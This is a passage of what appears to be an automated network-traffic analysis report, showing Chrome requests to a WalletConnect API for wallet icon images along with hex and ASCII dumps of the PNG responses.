                                                                          2023-12-10 16:44:28 UTC1369INData Raw: 20 8b 16 21 85 80 d3 02 89 80 cb fa f6 78 51 51 f9 81 f2 03 f0 ae 57 c0 03 bf e9 e8 7d 0f 09 f1 f5 85 f7 9b bc e3 f0 9e a7 10 cb 0f 98 99 9f 9f 9f 04 8f a4 a4 48 73 cb cf 0f 88 8d 8d 0a a9 28 4a cb 48 2f ce 2d 38 53 b9 b9 74 ff d9 8e 5b cc 81 10 95 58 03 c9 86 38 62 c5 c3 0e 87 c8 c5 f1 ac 30 94 e6 ab 8d 7f ff c1 ba 5c 42 5c 16 4b b3 48 14 19 32 04 67 c2 fe a3 fc 41 21 df 1e 98 3b 77 ee 54 30 f8 5d 4f 8c 4a 4c 64 bf eb f0 c6 07 04 04 e4 e7 c3 7b 9f cf de f7 c0 c0 c0 b0 c0 c0 b0 b0 c0 b0 b0 b0 b0 38 6e 73 e2 92 e7 24 cf 99 93 4c 2c 6e 4e dc 9c b8 b8 b8 b0 b0 c0 c0 c8 fc d8 a8 8a f8 e3 79 47 73 ab ce 40 30 19 2b 00 31 4a 64 a3 3d 10 87 c3 f9 c3 93 7e 2e 48 c3 dc 51 11 1e 53 a6 30 85 58 c7 71 2b 69 60 1e f7 6c 78 50 85 f0 b0 8e 7d 56 3d 4d 7c eb 51 50 ff 6e
                                                                          Data Ascii: !xQQW}Hs(JH/-8St[X8b0\B\KH2gA!;wT0]OJLd{8ns$L,nNyGs@0+1Jd=~.HQS0Xq+i`lxP}V=M|QPn
                                                                          2023-12-10 16:44:28 UTC1369INData Raw: 00 1c c1 4c 1c 42 04 ff 8c 8b e3 43 59 1b 82 38 b0 28 8c 86 98 fc fd b3 f7 83 b7 26 07 c6 96 d7 a6 1f bd 70 ec d7 0b bf 8a 5b 26 27 ab ab 61 c3 84 ee 98 40 81 1e bb ae 25 1b 97 c0 9e d5 a7 9f 6e 34 03 e2 70 5c b1 5a 92 1b 92 2a 85 06 07 e2 ae a7 22 53 ce 7a 98 24 58 18 08 e1 81 3c 17 20 b9 73 e8 ea 99 33 57 0b 0a 0a 0a ce 14 60 ab 82 47 55 55 55 6e 6e 6e 6e 71 f1 d1 c2 8c 90 04 2a 10 31 a1 0a 97 43 b8 e2 ab 3e a4 48 98 30 30 0e 99 c6 8c 19 b3 66 cd a0 48 3e fc f0 43 44 24 2c 29 25 b1 a2 e8 38 54 98 6b 6b 6b d1 fe 49 7a 61 e1 51 a8 3b 96 9e 3d fc e5 97 df 40 79 fe fa f5 26 eb f1 82 1d e3 80 9d 44 2f 33 20 90 6a 99 48 c3 00 c3 5b 85 c1 80 98 e3 d0 4d 8d e5 73 95 fb 3f 34 3d 10 87 81 0c 64 3e ab 03 00 b9 70 0a de f8 5c d8 78 da 51 8c 3f ef d8 b1 7d c7 f6 ed
                                                                          Data Ascii: LBCY8(&p[&'a@%n4p\Z*"Sz$X< s3W`GUUUnnnnq*1C>H00fH>CD$,)%8TkkkIzaQ;=@y&D/3 jH[Ms?4=d>p\xQ?}
                                                                          2023-12-10 16:44:28 UTC1369INData Raw: 76 79 4b fa 6c 59 25 13 59 65 07 04 8a 5a 13 85 3c d7 15 75 c0 67 6f 3b 20 46 71 00 8f f6 f6 7b 84 04 48 1f 5c cd a5 40 be dd b6 7a 75 7e 7e 3e 62 41 cf 8f c4 c5 cd 49 46 3c 10 8e a0 a0 ad 99 c8 65 6d 0d 17 6a ee a9 32 11 63 ad 97 e9 84 95 b1 24 9f 35 46 12 88 e8 b7 c8 ff 82 83 e1 e5 60 bf 38 d8 31 39 9a 5b f5 2c 40 9c 8e 8b 6d 3a d9 8b 83 c9 03 5e 79 37 f3 36 73 59 ed f5 43 c7 e9 28 c6 1e 9a 92 49 f6 91 6f be 39 8b 1f c8 be d9 c7 8a eb 34 88 dc f9 f6 db d5 ab 57 2f 80 23 25 81 9c c6 1c c2 23 08 02 08 12 c8 56 ac 10 24 12 5a 37 d1 20 c1 4b 93 bb df 7f 7f f7 7b 6a 3f 81 11 22 6a 08 91 89 e0 1f cd 10 33 2f 9a 0e d3 e2 23 dd 31 a9 aa ee b3 65 c9 2a 30 9e 65 dd 7b 08 7d b6 4e 5e 2c be 88 ed 86 e1 92 6b e8 86 87 9e ae 4b 03 11 41 2f 75 40 6c 70 b4 6b a9 3b 14
                                                                          Data Ascii: vyKlY%YeZ<ugo; Fq{H\@zu~~>bAIF<emj2c$5F`819[,@m:^y76sYC(Io94W/#%#V$Z7 K{j?"j3/#1e*0e{}N^,kKA/u@lpk;
                                                                          2023-12-10 16:44:28 UTC1369INData Raw: 6b 36 c5 05 69 34 5b cb 34 e2 b0 54 07 9e fa ce be 69 d7 b4 f1 39 3d 0e 02 44 20 12 11 71 b9 e6 18 a2 51 5e 51 11 12 15 9b cf 2b 89 ec 9a 8d 70 bb 46 24 92 99 89 72 ad 60 5c 40 c1 28 c2 bf 27 9b 48 41 e7 d9 fd 8e 3c 0c 44 e9 14 84 5d d6 7d a9 ec cb fc 96 14 46 50 04 21 38 c6 88 48 06 f7 62 44 fe 8e 0f 67 07 41 f1 97 1c 97 af 2c 2d 93 81 7c fa e9 12 f3 fb 18 3f b6 21 65 5c d3 38 be 96 7b ac b5 6b d7 52 20 9a 15 87 e0 ab 9a 92 6f da ff 7e c4 ec 5f 9c fd 0d 5e 8e 73 a7 75 b9 e6 c4 81 03 07 60 ff 23 2a 36 25 9f ea 83 7a 2c c9 65 05 09 44 d0 be 5d 66 30 13 09 d8 1e 04 67 cf 56 92 60 5d 0a 0b cc 8f aa 38 5e 58 7c d2 08 24 e7 d1 4f 5f 13 89 68 8e 9e c8 c9 2f f7 55 83 05 a9 00 28 4a 44 28 fe 26 c4 25 25 96 c3 b6 ee 99 d3 25 7d 5d 06 e2 3c f2 78 8a 4b be 6a 2d b2
                                                                          Data Ascii: k6i4[4Ti9=D qQ^Q+pF$r`\@('HA<D]}FP!8HbDgA,-|?!e\8{kR o~_^su`#*6%z,eD]f0gV`]8^X|$O_h/U(JD(&%%%}]<xKj-
                                                                          2023-12-10 16:44:28 UTC1369INData Raw: b2 05 24 b2 78 cb 6f ef 51 22 68 51 3e d8 2c 90 b0 28 42 ca 5a c1 7e c9 91 51 45 79 47 4f 1e 02 20 1b 05 20 ab ac 81 38 37 dc 69 23 67 55 4c 21 aa bd ea 60 38 b4 40 3c a8 b5 6b 61 73 77 3e fb 9b 49 dd 25 22 00 64 35 06 c2 88 c4 69 88 50 26 dc 53 21 1c 51 15 45 79 b9 05 17 70 cf 0d ff 1a ac 91 91 a3 6a 90 42 6a a8 46 cc 24 c2 db 5e c6 48 12 d9 02 1a 79 8c 80 cc 88 46 22 19 33 b8 d7 60 2d 92 31 62 5c a7 1b 88 02 90 55 82 48 6c 80 38 42 af bc ca 93 29 71 6d ae 01 62 9e e5 7a 88 d6 d6 6a 0d a2 02 c1 6e 4b 04 12 28 75 4f 9a 43 81 cc 99 93 30 07 e1 40 9f b9 3c 02 62 7d 2b 8a 32 8a 0b ce 5c a0 57 a6 85 e0 3e 72 c4 48 83 d3 d2 76 23 cd a1 dd af 69 13 52 e8 da bf 18 01 41 cb 91 e8 31 83 59 89 d1 44 21 bd c4 52 bc 39 10 1b 97 e5 08 dd 50 37 85 cb c2 0c 06 09 ea 56
                                                                          Data Ascii: $xoQ"hQ>,(BZ~QEyGO 87i#gUL!`8@<kasw>I%"d5iP&S!QEypjBjF$^HyF"3`-1b\UHl8B)qmbzjnK(uOC0@<b}+2\W>rHv#iRA1YD!R9P7V


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          53192.168.2.549769104.18.27.464435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:26 UTC650OUTGET /w3m/v1/getWalletImage/fbd441cc-e861-46dc-48ae-a04228ddb500?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1
                                                                          Host: explorer-api.walletconnect.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __cf_bm=CrXZSKXu8ZgKzyOdQBeSUIBNIgVJ3sD4J7CBXgT0jfM-1702226664-1-Ad0SnxomqRFub2k1lBB/dWlE8xSqpNUxXb8Ef5NV91WLdS9Ug9mTw0zu7yezklS/cvZvVyVpp2lfgcm/kTVUtR8=
                                                                          2023-12-10 16:44:26 UTC678INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 32 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 31 36 30 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 33 64 38 65 63 38 65 37 34 38 36 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 4d 49 53 53 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:26 GMTContent-Type: image/pngContent-Length: 21606Connection: closeCF-Ray: 8336f3d8ec8e7486-MIACF-Cache-Status: MISSAccept-Ranges: bytesAccess-Control-Allow-Origin: *Cache-Control: public, max-
                                                                          2023-12-10 16:44:26 UTC691INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 90 00 00 01 90 08 03 00 00 00 b7 61 c6 fe 00 00 03 00 50 4c 54 45 47 70 4c 27 44 47 43 87 8b 71 f3 fb 26 41 44 26 41 43 72 f6 fe 26 41 42 58 b8 be 28 4b 4c 2b 4e 51 2d 52 54 2e 54 56 5a bb c1 4f a1 a6 69 dd e2 2b 4d 4f 2b 4e 50 4f a3 a8 45 8c 90 55 b2 b8 3d 79 7c 70 f0 f8 5c c1 c8 2a 4c 4e 63 d2 d8 6a e3 ea 47 91 95 6b e6 ed 6a e2 ea 5c c1 c8 6b e4 eb 3c 77 7b 66 da e0 27 45 47 40 80 84 6f ef f7 6d eb f2 33 61 64 34 63 66 6e ed f5 56 b4 ba 39 6f 72 6d ea f1 43 86 8a 67 d9 e0 27 45 46 28 47 49 69 e0 e7 27 43 45 29 49 4b 2b 4f 51 2a 4b 4d 71 f3 fb 6c e8 ef 2e 55 57 52 aa b0 28 47 49 4d 9e a3 33 61 63 63 d3 da 6f ee f6 33 61 64 48 93 97 5d c4 ca 30 5b 5d 62 cf d6 29 48 4a 28 47 49 34 64 67 2c 51 53 46
                                                                          Data Ascii: PNGIHDRaPLTEGpL'DGCq&AD&ACr&ABX(KL+NQ-RT.TVZOi+MO+NPOEU=y|p\*LNcjGkj\k<w{f'EG@om3ad4cfnV9ormCg'EF(GIi'CE)IK+OQ*KMql.UWR(GIM3acco3adH]0[]b)HJ(GI4dg,QSF
                                                                          2023-12-10 16:44:26 UTC1369INData Raw: c3 f5 f5 f5 fb fb fb 21 21 21 f9 f9 f9 d6 d6 d6 87 87 87 a2 a2 a2 26 26 26 ae ae ae de de de ea ea ea cd cd cd e4 e4 e4 b7 b7 b7 90 90 90 2a 2a 2a c6 c6 c6 4f 4f 4f c0 c0 c0 55 55 55 98 98 98 7c 7c 7c 44 44 44 49 49 49 2f 2f 2f 76 76 76 5a 5a 5a 40 40 40 36 36 36 33 33 33 3a 3a 3a 3d 3d 3d 67 67 67 6e 6e 6e 6a 6a 6a 72 72 72 5e 5e 5e 60 60 60 63 63 63 8a 52 93 b1 00 00 00 5f 74 52 4e 53 00 0a 0e 16 3b f9 dc a7 0e 02 06 14 1d 3c 3c 01 61 25 a8 3b a8 3c fd d6 4c eb 26 a7 58 74 a8 44 d9 09 d8 a7 c6 91 77 55 f9 d9 a7 12 d9 05 c6 99 a9 e9 f2 de 30 ee d9 d2 d7 78 d9 3c d3 b0 bb d9 e8 99 91 86 b7 dc f7 58 c2 8e f9 ab ed f9 ca 8f f0 f5 f6 1b 6b a3 f9 f3 f9 82 2a e6 90 66 eb a3 72 a3 7b 00 00 50 b6 49 44 41 54 78 9c ed 9d 09 5c 53 67 de ef c5 71 66 64 99 51 67 3a
                                                                          Data Ascii: !!!&&&***OOOUUU|||DDDIII///vvvZZZ@@@666333:::===gggnnnjjjrrr^^^```cccR_tRNS;<<a%;<L&XtDwU0x<Xk*fr{PIDATx\SgqfdQg:
                                                                          2023-12-10 16:44:26 UTC1369INData Raw: e6 da 12 8b 25 d0 a5 17 9d 39 bb 63 fb 4b 4f 3e f7 c8 63 7f 9a 6a b7 e5 ec e2 fa 87 2f ff b2 72 fb f6 f6 1d 07 32 94 3a d1 6c 2d 01 ed 11 2c 90 b6 c4 9c d8 d4 be fd ef af 3d f2 d8 2f a6 b8 4c 74 59 f6 ee fb 20 d7 6d 3f 15 9e e7 ad 9b b5 25 b9 7d 62 09 14 9c ca c8 7d 9b 9f fe fb 93 cf 3d 3c a5 5d e0 25 0b bf fa fc 77 1b 36 6f df b6 65 5f ac 4a 27 b8 df 37 62 fa 08 92 48 5b 62 0e ec dc fe f4 df 9f 7b f8 a1 29 44 e2 b4 fe f3 f7 56 ee 68 6f 3f 95 5c e9 2d 63 90 07 74 9f c4 e0 3b 10 c9 84 61 35 fb b7 3f fd f7 d7 9e 7a 6c 8a 1a 8e ce 2e 9f fd f6 cb 07 56 7e d3 be 73 5f 78 90 9a 37 a9 d7 8f 0c 34 c0 22 91 84 2f 97 cb e5 3a 05 49 52 c7 0b bf 94 4e 06 ae 2e e7 8b 45 02 f4 15 4d ea 2d c1 de c5 c9 67 37 6f ff e2 c9 a7 1e 9b 9a ba dd c5 f5 dd f7 1f dc bf ad 7d e7 a1
                                                                          Data Ascii: %9cKO>cj/r2:l-,=/LtY m?%}b}=<]%w6oe_J'7bH[b{)DVho?\-ct;a5?zl.V~s_x74"/:IRN.EM-g7o}
                                                                          2023-12-10 16:44:26 UTC1369INData Raw: 64 0b 45 fc b0 c2 03 61 42 c2 82 99 09 65 20 39 4e 22 42 8a 22 27 4d 13 2d dc 69 1d 39 72 f4 e8 d1 43 87 0e d5 c4 87 a5 c7 c9 25 f4 33 7e 96 24 3f 72 4f 7b fb 93 8f 3c c6 f0 48 bb d3 da cf 1f d8 b0 e3 9b bd a9 d1 3a da fe 8a 25 d0 71 6a 33 77 f9 44 55 1f 22 80 18 3b ac dd 44 ca 8b f1 f8 96 9c 61 59 e4 b1 99 8a c6 36 23 30 64 2b b1 48 64 af 81 88 51 75 68 0e 04 21 72 e8 d0 a1 ea 28 9f d8 8c bc 34 19 fd 7c 8b 27 53 35 6d da f6 f7 27 1f 61 b6 d1 e8 0c 0a 90 9d df 9c 8c cf a7 5d 0f c2 22 45 40 4b 70 78 7d f5 a1 43 87 30 20 07 4c 80 9c 3d 6b 11 88 85 fc 8a cc 83 c4 62 db 36 f0 67 db 36 33 24 06 bf 45 95 6b 99 03 31 c4 75 0a 20 08 91 43 5b 9b 02 8b f3 85 72 da 6d 23 96 ac 38 6a cb 36 30 3e c2 64 aa e5 f4 87 07 36 ec ff 66 53 a9 87 82 6e 3d c8 13 4b 13 9a 63 cf
                                                                          Data Ascii: dEaBe 9N"B"'M-i9rC%3~$?rO{<H:%qj3wDU";DaY6#0d+HdQuh!r(4|'S5m'a]"E@Kpx}C0 L=kb6g63$Ek1u C[rm#8j60>d6fSn=Kc
                                                                          2023-12-10 16:44:26 UTC1369INData Raw: 44 50 d8 ae b2 9a ea 23 07 0c c5 3a e1 b4 70 20 65 4d d9 a9 0d 1a 3a bd 2d 6d cc b1 fd 3b 5e 9d dc a4 07 97 3f 7c f9 e0 ce 1d bb 43 d9 b6 33 5e 81 3c 3a 31 b6 be c9 1a 90 03 47 7d 92 6a 95 5e 5a 05 9f e7 3e 5d ac c2 a2 80 a1 c8 a5 1a 55 43 71 4c d9 51 02 c8 21 a3 28 82 a6 69 4d d9 a9 87 43 6c 37 c1 59 72 55 e8 de 1d 2b 9f 7a 6c 12 ab a7 9d 17 7e fe c0 ca cd 5b 9a 12 d4 b6 2e 07 f1 74 5e c1 b9 08 0f a3 98 5e 4d 78 ac 23 47 6b 7c 62 c3 5a e2 44 ee d3 c6 45 d9 14 8b e5 2e d2 f9 26 14 c5 9e a9 39 7a 04 6f c1 93 6a 43 3c 6f ae 0f af f0 90 d9 4c b6 04 fc f2 a3 c7 77 be 3a 99 59 28 2e cb de df b0 69 d3 b1 56 85 cd 9e 22 4f ec 59 14 79 a6 a9 ac c9 24 84 54 13 11 e4 68 54 4c 9e 9f 54 6e df 74 95 fb 2f 58 20 e1 2b 42 6a c3 6b 8e 18 75 7c 89 a8 8e d6 31 67 4a 9b 3d
                                                                          Data Ascii: DP#:p eM:-m;^?|C3^<:1G}j^Z>]UCqLQ!(iMCl7YrU+zl~[.t^^Mx#Gk|bZDE.&9zojC<oLw:Y(.iV"OYy$ThTLTnt/X +Bjku|1gJ=
                                                                          2023-12-10 16:44:26 UTC1369INData Raw: 7e 3a 36 c1 ca 36 bc 22 85 7f 68 29 06 04 73 59 68 af b7 3e 50 69 ff 2e 0f 33 51 90 44 5f 5c da 44 0a ea 68 de 0b 76 bb 69 55 59 6b a1 e8 a2 4b 8f ef 7f f5 31 7b 5a be ae 7f 78 e0 db 4d 27 c2 bc 2d b7 ca 58 32 cf e0 d8 64 02 48 bd 21 86 c4 94 58 8d 69 b3 48 3c 7e 40 5e 6e 99 09 10 40 24 3e 30 d8 d3 ca ec 39 71 5c ea 71 50 1b da 91 67 2d 7b f7 d1 2d 9b 0e 25 58 de ef 07 12 68 6b 53 4a d1 7d 92 8c 80 d4 c7 57 0a ad 39 d0 59 25 58 e2 db 5c da 44 01 24 37 b4 dc 4a 8f 9b 27 ce 3a b9 e5 d5 37 ed 59 c0 f3 fb 2f df db 72 bc 2c c0 e2 27 9d 25 90 55 65 46 c6 1b 80 10 59 56 64 98 07 9d 49 a7 b3 44 b0 8c 1b e6 63 02 24 3b 3b 39 3e 3e 32 8c ad b3 f8 5b 10 5c 5b bd 67 e5 a3 0f db 01 e4 b7 ef 3f 78 fc 54 a9 da e2 7c 77 96 24 a2 32 30 de 1c 48 7d 7c 96 4a 31 37 fc 15 2a
                                                                          Data Ascii: ~:66"h)sYh>Pi.3QD_\DhviUYkK1{ZxM'-X2dH!XiH<~@^n@$>09q\qPg-{-%XhkSJ}W9Y%X\D$7J':7Y/r,'%UeFYVdIDc$;;9>>2[\[g?xT|w$20H}|J17*
                                                                          2023-12-10 16:44:26 UTC1369INData Raw: 4d 2a a4 02 02 4b 95 ad 46 40 c0 5c d2 f8 a4 72 ea 14 79 6e 89 25 d2 36 a4 a2 40 4a 0d 40 02 83 a3 a9 5c 0d 0f 05 42 73 6a d6 e2 07 bf dd 4d 09 84 25 a8 2b 49 8a 05 2e 8b e4 b3 b2 4b c3 a8 dd db 5c 13 4f ee 91 44 8c 86 e0 40 c2 5b 4b a8 d2 55 14 c8 a3 bf a1 37 13 e8 4f 96 81 70 8b 63 cc 80 44 e6 e9 e7 68 df dd 58 90 40 9b 08 86 24 0c 40 76 ed 8a 0d 4f 29 d6 53 3c d6 3e 20 96 2d 44 a4 4c 4c 35 b8 2c 0c 48 6c 02 7f 3e a4 bb 23 9b cb 54 06 c6 63 a3 53 28 10 70 6a 65 96 2f c5 a0 08 8f af 6c fa f6 14 7d 0b d9 b3 3b a9 90 22 16 b1 44 fe 49 81 28 10 43 54 cf 4d 52 cd 9e 9d 01 26 25 96 2e 28 23 17 37 10 1c 48 78 26 d5 54 4e 00 64 0f 6d 20 8b 01 90 1c 0a 20 10 3f 2f 30 9c 00 92 8b 02 09 0c f6 b6 bd e3 e0 9c 10 4b ae 0a 8e 34 b4 16 81 c7 8a 0d 0f 4f 52 4a cd fb ae
                                                                          Data Ascii: M*KF@\ryn%6@J@\BsjM%+I.K\OD@[KU7OpcDhX@$@vO)S<> -DLL5,Hl>#TcS(pje/l};"DI(CTMR&%.(#7Hx&TNdm ?/0K4ORJ
                                                                          2023-12-10 16:44:26 UTC1369INData Raw: a7 43 a6 66 a0 40 88 b6 09 00 12 6a 01 c8 ee ff fd c0 e4 80 f0 35 64 20 b1 53 09 04 16 5f b8 da 7d 71 e0 7c e3 24 ad 03 55 63 e3 b9 81 8b dd 37 7b 1d 91 01 23 40 76 91 92 de 50 c7 01 91 d7 e5 a5 86 9a 98 48 69 f3 14 00 61 1d ec bc 06 bc 15 23 e6 81 ea fc c0 e0 d8 8d 0b 0e 88 ed 06 0b 41 81 84 3a 0e 08 24 f7 cb 4b 45 89 4c 2d 10 9e b8 f7 5a f7 a8 5d 45 07 0d 75 0c 8d dd b8 cd fc 56 20 18 10 c2 63 59 06 92 6c 0f 90 7d 47 b3 28 2c c4 0f b1 10 1c 48 78 6c e4 d4 00 11 df b9 de d7 d5 c6 88 b3 22 e9 5c c7 d0 e8 f5 9b 62 a6 93 2d 02 08 11 41 2c 02 d9 67 1f 90 80 e9 01 84 25 e8 bc 76 7d 98 99 60 6e aa b6 e1 2b 37 3b 19 8e 23 b0 67 52 20 ee b1 02 ad 01 51 31 07 24 14 6b 67 01 a7 95 eb 68 20 70 ef d5 91 c1 01 1b fd c3 09 ea 5c db c5 eb 37 19 ce b5 60 cf 94 c0 5d e4
                                                                          Data Ascii: Cf@j5d S_}q|$Uc7{#@vPHia#A:$KEL-Z]EuV cYl}G(,Hxl"\b-A,g%v}`n+7;#gR Q1$kgh p\7`]
                                                                          2023-12-10 16:44:26 UTC1369INData Raw: 98 00 72 28 2a 98 02 48 9d c3 81 b0 44 bd f7 fa 6d 46 f4 b6 8b 57 c6 ed 4e 5c 25 bd 17 7a a7 e0 84 13 04 08 29 c5 4a 49 b2 04 24 76 f2 40 80 85 24 a5 18 d5 22 e1 c1 8c 02 39 d8 79 a3 c7 66 4d 78 be ab fb aa fd 33 0e 61 91 68 2a 0e 85 85 3d 32 63 88 1a 04 07 92 4f 09 e4 50 f5 ef e8 03 29 0b d6 58 00 62 4c 24 3c 38 8e 51 20 17 6c 46 90 c6 8e fe 9e ab d3 77 23 6d d8 a3 35 26 d4 c8 63 25 25 59 04 62 87 85 58 01 92 44 ae 0e 99 06 32 de d3 6f 7d 5a 43 63 47 ff d8 e5 de e9 bb 91 36 cc c1 80 e0 11 dd 1a 10 fa 16 52 6d 1b 08 16 45 18 05 02 8b af 8d da 18 26 3c 37 34 7c a3 77 1a ef 82 0a 73 8a 62 48 0e 8b 41 20 96 62 88 b1 cf 62 16 88 e8 ee f5 2e 1b 29 56 c7 e8 f5 3b d3 f9 80 70 04 48 2a d9 40 32 a8 81 78 84 1f da 3a 69 20 0d 19 19 19 08 10 c2 44 18 05 c2 12 df 18
                                                                          Data Ascii: r(*HDmFWN\%z)JI$v@$"9yfMx3ah*=2cOP)XbL$<8Q lFw#m5&c%%YbXD2o}ZCcG6RmE&<74|wsbHA bb.)V;pH*@2x:i D


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          54192.168.2.549773104.18.27.464435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:26 UTC650OUTGET /w3m/v1/getWalletImage/7fd5a23a-3a01-4cfb-3c8b-9f43ae414400?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1 HTTP/1.1
                                                                          Host: explorer-api.walletconnect.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __cf_bm=CrXZSKXu8ZgKzyOdQBeSUIBNIgVJ3sD4J7CBXgT0jfM-1702226664-1-Ad0SnxomqRFub2k1lBB/dWlE8xSqpNUxXb8Ef5NV91WLdS9Ug9mTw0zu7yezklS/cvZvVyVpp2lfgcm/kTVUtR8=
                                                                          2023-12-10 16:44:28 UTC948INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 32 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 70 6e 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 38 36 39 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 33 64 63 30 65 63 34 33 31 64 32 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 4d 49 53 53 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:28 GMTContent-Type: image/pngContent-Length: 8692Connection: closeCF-Ray: 8336f3dc0ec431d2-MIACF-Cache-Status: MISSAccept-Ranges: bytesAccess-Control-Allow-Origin: *Cache-Control: public, max-a
                                                                          2023-12-10 16:44:28 UTC421INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 90 00 00 01 90 08 03 00 00 00 b7 61 c6 fe 00 00 01 77 50 4c 54 45 47 70 4c d8 a4 45 da a1 47 da a1 47 db a2 48 db a1 48 da a1 47 da a0 46 da a3 46 da a1 47 db a2 46 da a1 47 da a1 47 da a1 47 da a1 47 da a1 47 da a1 47 da a1 46 d9 9f 46 da a1 47 d9 a1 47 d9 9f 46 d9 9e 46 db a1 46 da a1 47 da a1 47 da a0 46 da a1 47 da a1 47 da a1 47 da a1 47 da a1 47 d5 9f 46 da a1 47 da a1 47 da a1 47 da a1 47 da a1 47 da a1 47 d4 9a 47 da a1 47 da a1 47 da a1 47 da a1 47 da a1 47 da a1 47 da a1 47 da a1 47 da a1 47 da a1 47 da a1 47 da a1 47 da a1 47 da a1 47 da a1 47 da a1 47 da a1 47 da a1 47 d9 a0 47 da a1 47 da a1 47 da a1 47 da a1 47 da a1 47 da a1 47 da a1 47 da a1 47 da a1 47 da a1 47 da a1 47 da a1 47 da
                                                                          Data Ascii: PNGIHDRawPLTEGpLEGGHHGFFGFGGGGGGFFGGFFFGGFGGGGGFGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG
                                                                          2023-12-10 16:44:28 UTC1369INData Raw: 00 00 7a 74 52 4e 53 00 08 a7 a2 9c 96 d6 20 06 f9 29 fe f6 f3 cf f7 ef 0c 09 d9 23 04 05 14 e0 fb 10 98 5b d4 1e c1 03 8a 27 25 9e ec 60 02 fa 44 17 69 c6 51 e7 87 dc 56 84 3a fc f0 a5 4b ca ad 12 2f 1c f4 de 4e 58 19 62 c4 67 ea f1 2d 35 0e e5 81 c8 d1 be 90 b7 6e 71 da 46 2b 0b 8d a9 1b 31 a1 41 e3 7e bb 3f 9b ed 33 48 53 95 ce 4d b0 92 5e 6c b3 7a cc 64 37 3c ab 01 01 74 77 01 01 d2 7c b2 70 00 00 1f b2 49 44 41 54 78 9c ed 9d 69 5b 13 4d 13 85 03 28 10 16 d9 65 57 04 64 53 04 d9 41 40 c1 05 41 51 16 45 45 50 10 44 45 5c 50 5c 9e f6 fd f1 ef 95 40 20 c9 74 9f 9a 9a e9 4c 66 92 be bf 12 9a 99 49 a8 54 9f 3e 55 15 0a 19 0c 06 83 c1 60 30 18 0c 7a 58 ab 48 f7 15 04 9d 9c cf 5a 1f e1 ef f6 4a 9d cb 65 21 4d 0f 96 35 ae 36 37 5d df a1 71 b9 2c e4 56 b3 98
                                                                          Data Ascii: ztRNS )#['%`DiQV:K/NXbg-5nqF+1A~?3HSM^lzd7<tw|pIDATxi[M(eWdSA@AQEEPDE\P\@ tLfIT>U`0zXHZJe!M567]q,V
